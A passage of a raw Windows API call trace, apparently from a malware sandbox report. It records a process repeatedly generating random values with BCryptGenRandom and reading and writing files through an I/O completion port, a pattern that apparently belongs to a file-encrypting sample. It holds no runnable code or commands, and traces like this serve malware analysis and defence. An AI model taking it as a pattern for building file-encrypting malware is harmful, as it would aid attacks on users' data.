lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0109.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0109.646] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.647] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.647] free (_Block=0x77d800) [0109.647] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.647] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.647] free (_Block=0x1fa4848) [0109.647] free (_Block=0x2071818) [0109.647] free (_Block=0x77d908) [0109.647] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0109.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0109.656] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.656] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.656] free (_Block=0x77d800) [0109.656] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.657] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.657] free (_Block=0x1fa4848) [0109.657] free (_Block=0x2071818) [0109.657] free (_Block=0x77d908) [0109.657] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.756] WriteFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0109.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0109.778] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.778] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.778] free (_Block=0x77d800) [0109.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.778] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.779] free (_Block=0x1fa4848) [0109.779] free (_Block=0x2071818) [0109.779] free (_Block=0x77d908) [0109.779] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0109.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0109.797] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.797] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.797] free (_Block=0x77d800) [0109.797] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.797] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.797] free (_Block=0x1fa4848) [0109.798] free (_Block=0x2071818) [0109.798] free (_Block=0x77d908) [0109.798] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.822] CloseHandle (hObject=0x13c0) returned 1 [0109.835] free (_Block=0x3e70008) [0109.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.842] CloseHandle (hObject=0x81c) returned 1 [0109.844] free (_Block=0x3db00b8) [0109.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.850] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.857] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.862] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x976, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0109.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0109.900] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.901] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.901] free (_Block=0x77d800) [0109.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.901] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.901] free (_Block=0x1fa4848) [0109.901] free (_Block=0x2071818) [0109.901] free (_Block=0x77d908) [0109.901] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0110.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0110.263] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.263] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.263] free (_Block=0x77d800) [0110.263] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.263] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.263] free (_Block=0x1fa4848) [0110.263] free (_Block=0x2071818) [0110.263] free (_Block=0x77d908) [0110.263] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.264] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.277] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xb88, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.277] CloseHandle (hObject=0x3bc) returned 1 [0110.278] free (_Block=0x3ef0008) [0110.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0110.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0110.288] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.288] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.288] free (_Block=0x77d800) [0110.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.288] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.288] free (_Block=0x1fa4848) [0110.288] free (_Block=0x2071818) [0110.289] free (_Block=0x77d908) [0110.289] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.290] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.302] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.316] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x600c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.327] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x8b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.327] CloseHandle (hObject=0x3bc) returned 1 [0110.332] free (_Block=0x3ef0008) [0110.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0110.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0110.341] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.341] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.341] free (_Block=0x77d800) [0110.341] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.341] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.341] free (_Block=0x1fa4848) [0110.341] free (_Block=0x2071818) [0110.341] free (_Block=0x77d908) [0110.341] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.342] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.354] CloseHandle (hObject=0x3ac) returned 1 [0110.377] free (_Block=0x1ff1e60) [0110.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.390] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0110.390] CloseHandle (hObject=0x3bc) returned 1 [0110.392] free (_Block=0x1ff1e60) [0110.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.162] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.162] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.162] free (_Block=0x77d7a8) [0112.162] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.162] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.162] free (_Block=0x2071c20) [0112.162] free (_Block=0x2071d30) [0112.162] free (_Block=0x77d8b0) [0112.163] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.167] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.177] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.177] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.177] free (_Block=0x77d7a8) [0112.177] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.177] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.178] free (_Block=0x2071c20) [0112.178] free (_Block=0x2071d30) [0112.178] free (_Block=0x77d8b0) [0112.178] WriteFile (in: hFile=0x344, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.187] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.188] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.188] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.188] free (_Block=0x77d7a8) [0112.188] calloc 